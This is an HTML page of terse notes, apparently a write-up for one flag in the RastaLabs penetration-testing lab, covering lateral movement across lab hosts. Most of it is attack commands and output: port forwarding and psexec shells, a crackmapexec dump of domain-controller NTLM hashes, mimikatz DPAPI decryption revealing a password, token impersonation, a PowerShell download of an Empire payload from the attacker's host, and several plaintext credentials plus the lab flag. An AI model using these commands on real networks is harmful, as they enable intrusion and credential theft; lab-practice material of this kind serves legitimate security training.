<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>15 flag</title>
</head><body><br/>
from ws02, portfwd to ws01<br/>
<br/>
portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445<br/>
<br/>
then use msf psexec to get shell on ws01<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
also, can use impacket psexec to get shell on ws01,<br/>
<br/>
add route in meterpreter<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
set socks4a proxy in msf, then edit /etc/proxychains.conf , then do the following<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
used crackmapexec to enumerate,<br/>
<br/>
<img src="screenshot 4.png" /><br/>
<br/>
<br/>
dump hashes,<br/>
<br/>
proxychains crackmapexec 10.10.120.1 -u rweston_da -H ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa --ntds drsuapi<br/>
<br/>
<img src="screenshot 5.png" /><br/>
<br/>
<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\epugh:1151:aad3b435b51404eeaad3b435b51404ee:326457b72c3f136d80d99bdbb935d109:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\bowen:1152:aad3b435b51404eeaad3b435b51404ee:2acfc0ad1622bfbaf46324a32d0d650c:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\ngodfrey:1153:aad3b435b51404eeaad3b435b51404ee:d6c06d630325b6e74431f25ef115a301:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\rweston:1154:aad3b435b51404eeaad3b435b51404ee:3ff61fa259deee15e4042159d7b832fa:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\epugh_adm:1159:aad3b435b51404eeaad3b435b51404ee:8bfd10f0484f52314831296e66ef7c51:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\ngodfrey_adm:1160:aad3b435b51404eeaad3b435b51404ee:e8064c00e18fde9f1aeca7f889233743:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\rweston_da:1161:aad3b435b51404eeaad3b435b51404ee:3ff61fa259deee15e4042159d7b832fa:::<br/>
CME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;10.10.120.1:445 DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rastalabs.local\ahope:1164:aad3b435b51404eeaad3b435b51404ee:4419266b4c32b1729ad6687147b26b74:::<br/>
<br/>
in ws01, found vault is installed,<br/>
<br/>
use same technique like epugh [flag 9] , upload mimikatz<br/>
<br/>
dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\849B07832DF408F54711A4BD0EB36FD5 /masterkey:bbfdda29906cd49b7ca3e019a1f2dd79d153611a2c3e932520e41b3d228cec844e2ae46faa2abe236612f52da93b26e85d08c562a7288327d318a65b641f23af<br/>
<br/>
<img src="screenshot 6.png" /><br/>
<br/>
UserName &nbsp; &nbsp; &nbsp; : RLAB\rweston_da<br/>
CredentialBlob : W0lv3rh@mpt0n!!<br/>
<br/>
also found startup.bat in,<br/>
c:\Users\rweston\Start Menu\Programs\Startup<br/>
<br/>
it is powershell script, base64 encoded, so decoded to see whats inside it,<br/>
<br/>
<img src="screenshot 7.png" /><br/>
<br/>
it is evident that something is in clipboard, so lets monitor it<br/>
<br/>
in meterpreter, load incognito and impersonate rweston<br/>
<br/>
<img src="screenshot 11.png" /><br/>
<br/>
<br/>
transfer shell to empire to monitor clipboard<br/>
powershell -command "&amp; { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}"<br/>
<br/>
<img src="screenshot 8.png" /><br/>
<br/>
<br/>
<img src="screenshot 9.png" /><br/>
<br/>
<br/>
username - rweston<br/>
password - BullyBully<br/>
firewall url - https://10.10.120.254/<br/>
<br/>
login to web01 --&gt; sql01 ---&gt; fs01 --&gt; visit the url<br/>
<br/>
xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10 <br/>
<br/>
<img src="screenshot 10.png" /><br/>
<br/>
<br/>
RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}<br/>
<br/>
</body></html>